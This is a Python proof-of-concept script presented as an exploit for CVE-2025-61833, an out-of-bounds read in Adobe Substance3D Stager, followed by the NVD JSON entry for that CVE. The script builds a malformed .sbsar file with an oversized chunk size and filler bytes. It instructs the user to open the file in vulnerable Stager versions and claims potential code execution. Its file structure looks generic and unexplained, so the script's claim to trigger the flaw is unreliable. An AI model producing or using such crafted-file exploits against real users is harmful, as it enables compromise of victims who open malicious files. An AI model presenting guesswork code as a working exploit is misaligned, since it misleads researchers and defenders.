CVE-2025-61833

// CVE-2025-61833 PoC - Adobe Substance3D Stager Out-of-Bounds Read // This PoC demonstrates the vulnerability by creating a crafted file // that triggers an out-of-bounds read when parsed by Substance3D Stager import struct import os def create_crafted_sbsar(): """ Generate a crafted .sbsar file that triggers OOB read in Substance3D Stager The vulnerability exists in the file parsing routine when handling malformed input data structures """ # SBSAR file header structure header = bytearray() # Magic bytes for SBSAR format header += b'SBSAR' # File signature header += struct.pack('<I', 0x00000001) # Version major header += struct.pack('<I', 0x00000001) # Version minor # Crafted chunk that triggers OOB read # Modifying size fields to cause boundary violation chunk_type = b'PROP' # Property chunk type chunk_size = 0xFFFFFFFF # Malformed size causing overflow crafted_data = bytearray() crafted_data += chunk_type crafted_data += struct.pack('<I', chunk_size) # Fill with specific byte patterns to trigger vulnerability # These patterns are designed to exploit the parsing logic payload = b'\x41' * 256 crafted_data += payload # Append additional malformed structures for i in range(10): crafted_data += struct.pack('<I', 0x41414141) # Repeated markers crafted_data += struct.pack('<Q', 0x00000000FFFFFFFF) # Boundary markers # Complete file structure file_data = header + crafted_data return bytes(file_data) def main(): print("[*] CVE-2025-61833 PoC Generator") print("[*] Adobe Substance3D Stager Out-of-Bounds Read") # Generate crafted file poc_file = create_crafted_sbsar() # Save the PoC file output_path = 'CVE-2025-61833_poc.sbsar' with open(output_path, 'wb') as f: f.write(poc_file) print(f"[+] PoC file created: {output_path}") print(f"[+] File size: {len(poc_file)} bytes") print("[+] To trigger: Open this file with Adobe Substance3D Stager <= 3.1.5") print("[+] Expected result: Out-of-bounds memory read / potential code execution") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-61833", "sourceIdentifier": "[email protected]", "published": "2025-11-11T21:15:39.243", "lastModified": "2025-11-12T18:40:45.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Stager versions 3.1.5 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.6", "matchCriteriaId": "6EEF4010-0833-4D6B-9C45-FC8F85B3496A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_stager/apsb25-113.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}